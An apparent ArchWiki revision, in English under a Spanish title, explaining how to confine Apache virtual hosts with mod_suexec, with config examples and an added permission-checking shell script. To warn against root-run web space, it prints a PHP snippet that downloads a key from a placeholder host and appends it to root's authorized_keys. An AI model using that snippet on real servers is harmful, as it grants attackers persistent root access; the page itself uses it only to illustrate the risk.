Difference between revisions of "Apache, suEXEC and Virtual Hosts (Español)"

From ArchWiki
[[Category:Redes (Español)]]
#redirect [[Apache_HTTP_Server_(Español)]]
[[Category:CÓMOs (Español)]]
 
 
 
{{i18n_links_start}}
 
{{i18n_entry|English|Apache, SuExec and virtual Hosts}}
 
{{i18n_entry|简体中文|Apache, SuExec y los servidores virtuales (Español)}}
 
{{i18n_links_end}}
 
 
 
== Apache, SuExec and virtual Hosts ==
 
 
 
This document describes how to use Apache's SuExec module to set up virtual hosts that run under an ordinary user's privileges. In general it is good practice not to give web space superuser privileges, as the following brutal piece of PHP code shows:
 
 
 
<pre>
  <?php
    # of course this link doesn't lead anywhere
    $rsa_key = file('http://yourhost.homeip.net/id_rsa.pub');
    exec("cat ${rsa_key[0]} >>/root/.ssh/authorized_keys");
  ?>
</pre>
 
 
 
Got the point? To prevent this, never let your virtual hosts have write access to anything except their own home directory. Unfortunately this method requires Apache to run as the superuser, but that is not a big problem, because you do not need superuser privileges to run the default DocumentRoot either.
 
 
 
If you plan to have several FTP accounts, each pointing at its own space that needs write access and whose files must be readable by Apache, you should consider using SuExec.
 
<br>
 
==== Prerequisites ====
 
* You need to be familiar with basic Apache configuration, especially virtual hosts

* Administrator privileges on the target host

* Knowledge of how to add users

* Knowing how to use pacman
 
<br>
 
==== Adding the SuExec module to Apache ====
 
* Load the SuExec module in ''/etc/httpd/conf/httpd.conf'' like this:
 
<pre>
LoadModule suexec_module        lib/apache/mod_suexec.so
</pre>
 
* make sure Apache's default DocumentRoot does not run as superuser either!
 
<pre>
User http
Group http
</pre>
 
<br>
 
 
 
==== Setting up a virtual Host to use SuExec ====
 
One way to do it is directly in ''/etc/httpd/conf/httpd.conf'', but I suggest using a separate file if you intend to create more than just a couple of virtual hosts. Either way, a virtual host that is supposed to use SuExec may look something like this:
 
 
 
<pre>
<VirtualHost 192.168.0.1:80>
        ServerName myhost
        ServerAlias  myhost.localdomain
        # this is where requests for / go
        DocumentRoot /home/www/vhosts/myhost.localdomain/htdocs

        # here you tell which user (myhost) and group (ftponly) Apache should use
        SuexecUserGroup myhost ftponly

        # the following are optional but might be of use for you
        # URL path and file path must both end in a slash, otherwise
        # /cgi-bin/foo is mapped to .../cgi-binfoo
        ScriptAlias /cgi-bin/ /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin/
        php_admin_value open_basedir /home/www/vhosts/myhost.localdomain/htdocs
        php_admin_value upload_tmp_dir  /home/www/vhosts/myhost.localdomain/tmp
        # Safe mode will be removed as of PHP 6. You may want to not enable it.
        php_admin_flag safe_mode On
        # ErrorDocument takes a URL path (relative to DocumentRoot) or a message,
        # not a filesystem path; /404.html here is a placeholder document in htdocs
        ErrorDocument 404 /404.html
        <Directory "/home/www/vhosts/myhost.localdomain/htdocs">
                AllowOverride None
                Order allow,deny
                Allow from all
                Options +SymLinksIfOwnerMatch +Includes
        </Directory>
</VirtualHost>
</pre>
 
<br>
 
Note that we set upload_tmp_dir to a folder outside the document root of your web site (not /home/www/vhosts/myhost.localdomain/htdocs/tmp). It should also not be readable or writable by any other system user. This is for security reasons: that way an uploaded file cannot be modified or overwritten by someone else while PHP is still processing it.
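As an added example (not part of this wiki page or of the Apache project), the following POSIX shell pre-flight check tests a vhost's cgi-bin against the ownership and permission rules suexec enforces before it will run a script as the SuexecUserGroup user. It assumes GNU stat (Linux); the function and variable names are its own, and it does not check the compiled-in minimum uid/gid or the suexec docroot prefix.

```sh
#!/bin/sh
# Pre-flight check for the rules mod_suexec enforces before it will run a CGI
# script as the vhost's SuexecUserGroup user. Assumes GNU stat (Linux).
# Not covered: the compiled-in minimum uid/gid and the suexec docroot prefix.

# suexec_user_ok USER: suexec never executes anything as root.
suexec_user_ok() {
    uid=$(id -u "$1" 2>/dev/null) || { echo "no such user: $1" >&2; return 1; }
    [ "$uid" -ne 0 ] || { echo "refusing to run as uid 0 ($1)" >&2; return 1; }
}

# _owned_and_locked PATH USER: PATH must be owned by USER, must not be
# group- or world-writable (suexec counts both as "writable by others"),
# and must not carry the setuid or setgid bit.
_owned_and_locked() {
    path=$1; owner=$2
    info=$(stat -c '%U %A' "$path" 2>/dev/null) || { echo "$path: cannot stat" >&2; return 1; }
    actual=${info%% *}; mode=${info#* }      # e.g. "myhost" and "-rwxr-xr-x"
    if [ "$actual" != "$owner" ]; then
        echo "$path: owned by $actual, not $owner" >&2; return 1
    fi
    case $mode in                            # 10 chars: type, user, group, other
        ?????w????|????????w?)
            echo "$path: writable by group or others ($mode)" >&2; return 1 ;;
        ???[sS]??????|??????[sS]???)
            echo "$path: setuid or setgid ($mode)" >&2; return 1 ;;
    esac
}

# suexec_dir_ok USER DIR: the CGI directory and every regular file in it.
suexec_dir_ok() {
    user=$1; dir=$2; rc=0
    [ -d "$dir" ] || { echo "$dir: not a directory" >&2; return 1; }
    _owned_and_locked "$dir" "$user" || rc=1
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -f "$f" ] || continue              # an unmatched glob stays literal
        _owned_and_locked "$f" "$user" || rc=1
    done
    return $rc
}

# suexec_check USER DIR: both checks, e.g. for the vhost above:
#   suexec_check myhost /home/www/vhosts/myhost.localdomain/htdocs/cgi-bin
suexec_check() {
    suexec_user_ok "$1" && suexec_dir_ok "$1" "$2"
}
```

Run it after populating a vhost's cgi-bin; every reason for a refusal is printed on stderr, which is the same information suexec would otherwise only leave in its own log.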
 
 
 
==== "Disabling" default DocumentRoot ====
 
To further harden your setup you can disable the default ''DocumentRoot'', so that Apache does not execute anything as the superuser it itself runs as. This procedure does not really disable it; rather, it points the default server somewhere that is no longer remotely accessible. This is easily achieved by replacing your default ''ServerName'' with the following:
 
 
 
<pre>
ServerName localhost:80
</pre>
 
 
 
==== Finishing up ====
 
As every time you change default configuration parameters, you need to restart Apache for them to take effect.
 
 
 
<pre>
/etc/rc.d/httpd restart
</pre>
 
 
 
==== External References ====
 
* more in-depth information about SuExec: http://httpd.apache.org/docs/suexec.html
 
* same about VirtualHosts: http://httpd.apache.org/docs/vhosts/index.html
 
 
 
----
 
Author: kth5
 

Latest revision as of 21:59, 25 November 2017